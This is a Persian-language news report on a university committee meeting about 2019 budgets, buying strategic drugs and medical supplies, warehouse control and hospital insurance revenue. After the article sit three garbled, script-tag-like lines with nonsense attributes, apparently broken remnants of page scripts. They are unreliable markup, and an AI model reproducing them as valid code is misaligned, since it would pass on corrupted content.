مهندس رحیمی درجلسه ستاد راهبردی درآمد و کمیته منابع و مصارف دانشگاه عنوان کرد:

اولویت دانشگاه علاوه بر پرداخت‌های پرسنلی، تامین داروهاوملزومات پزشکی استراتژیک دانشگاه درسال ۹۸خواهد بود

اولین جلسه راهبردی درآمد و کمیته منابع و مصارف دانشگاه  در سال ۹۸ با حضور معاون توسعه مدیریت و منابع، معاون درمان و معاون غذا و داروی برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، اولین جلسه راهبردی درآمد و کمیته منابع و مصارف دانشگاه  با حضور مهندس رحیمی معاون توسعه مدیریت و منابع، دکتر جلیلی معاون درمان، دکتر خدادادی معاون غذا و دارو و دیگر مدیران و کارشناسان حوزه های مختلف دانشگاه در سال ۹۸ برگزار شد.

مهندس رحیمی معاون توسعه مدیریت و منابع دانشگاه ضمن اشاره به حوادث اخیر سیل در برخی از مناطق کشور بر لزوم مدیریت بهینه منابع و مصارف تاکید کرد.

وی در ادامه  در خصوص سیاست های مدیریت راهبردی  دارو و ملزومات مصرفی پزشکی  در دانشگاه اظهار داشت: کنترل  و نظارت برانبارهای دارویی و ملزومات پزشکی مطابق با سیاست های سال ۹۷ در حال انجام بوده و پیش بینی های لازم  جهت خرید داروها و ملزومات پزشکی استراتژیک و حیاتی انجام گرفته که در این رابطه معاونت غذا و دارو در سال گذشته عملکرد شاخص و بسیار خوبی را داشته است.

وی ضمن اشاره به سیاست های خرید  داروهای استراتژیک و حیاتی و همچنین ملزومات مصرفی و تجهیزات پزشکی  در سال ۹۸ بیان کرد: خرید داروها و ملزومات مصرفی و تجهیزات پزشکی برای یکسال خریداری و انبار خواهد شد.

مهندس رحیمی همچنین با اشاره به وضعیت بی ثبات ارزی و محدودیت منابع مالی افزود:علیرغم شرایط حاکم در سال گذشته، بدهی های دانشگاه به شرکتهای دارویی در وضعیت مطلوب قرار داشته و همین روند را در سال ۹۸ ادامه خواهیم داد.

وی ضمن اشاره به ساماندهی وضعیت انبارهای دانشگاه بر لزوم استفاده بهینه از اقلام موجودی در تمامی واحدهای تابعه تاکید کرد.

 مهندس رحیمی با اشاره به اهمیت وضعیت تملک سرمایه ای در دانشگاه و نگاه ویژه بر انبارها اظهار داشت: پیگیری و انبارگردانی مستمر انبار های دارویی، ملزومات مصرفی موجب می شود تا اجناس راکد در انبار ها به حداقل برسد و در صورت عدم نیازبرخی از تجهیزات، دارو و ملزومات در مراکز، با معاوضه آنان با مراکز دیگر از راکد ماندن آن جلوگیری کنیم.

در ادامه دکتر خدادادی معاون غذا و داروی دانشگاه ضمن اشاره به اهمیت نظارت و کنترل بر مصرف تجهیزات پزشکی و ملزومات مصرفی در بیمارستان ها و مراکزبهداشتی درمانی  و تامین منابع خرید دارو و تجهیزات بیان کرد: اگر کنترل و نظارت بر چگونگی مصرف تجهیزات پزشکی و ملزومات مصرفی را در واحدهای درمانی و بهداشتی افزایش دهیم، قطعا میتوانیم با برنامه ای دقیق سفارشات مورد نیاز در سال جاری را خریداری کنیم.

وی همچنین افزود: در سال ۹۷ موفق به کنترل و نظارت بیشتر بر خرید و مصرف دارو های حیاتی و استراتژیک با استفاده از سامانه مدیریت راهبردی در دانشگاه شدیم که در سال ۹۸ همین  روند ادامه خواهد داشت و از طرفی در خصوص ملزومات مصرفی و تجهیزات پزشکی نیز با ایجاد سامانه ای مشابه خرید و مصرف ملزومات مصرفی را به نحو مطلوبی مدیریت خواهیم کرد.

در ادامه گزارشی از روند خرید دارو و ملزومات مصرفی پزشکی توسط دکتر مساعد مدیر نظارت و ارزیابی مواد و فراورده هایی دارویی و دکتر ریحانی مدیر نظارت و ارزیابی تجهیزات پزشکی دانشگاه در سال ۹۷و ۹۸ ارائه و ضمن بررسی موضوعات و مشکلات موجود ، راهکارهای پیشنهادی در جلسه مورد بحث و بررسی قرار گرفت.

در ادامه دکتر عطایی معاون فنی معاونت بهداشتی با اشاره به لزوم مدیریت و ساماندهی انبارها در تمامی واحدهای دانشگاه، گزارشی از روند اقدامات انجام گرفته در این راستا در معاونت بهداشتی را بیان کرد.

در ادامه دکتر غیاث سرپرست اداره هماهنگی و امور بیمه تعرفه و استاندارد گزارشی از روند تخصیص منابع طرح تحول در سال ۹۷ ارائه نمود و دکتر جلیلی معاون درمان در ادامه گزارش با اشاره به وضعیت پیگیری منابع از وزارت متبوع بر ثبت اطلاعات بیمارستانها در سامانه HSE تاکید کرد.

 همچنین در پایان گزارشی از عملکرد واحدهای دانشگاه در سقف ابلاغی  سال ۹۷بیمه سلامت ارائه  و راهکارهای افزایش درامد اختصاصی بیمارستانها مورد بحث و بررسی قرار گرفت.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>

ارسال نظر شما

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *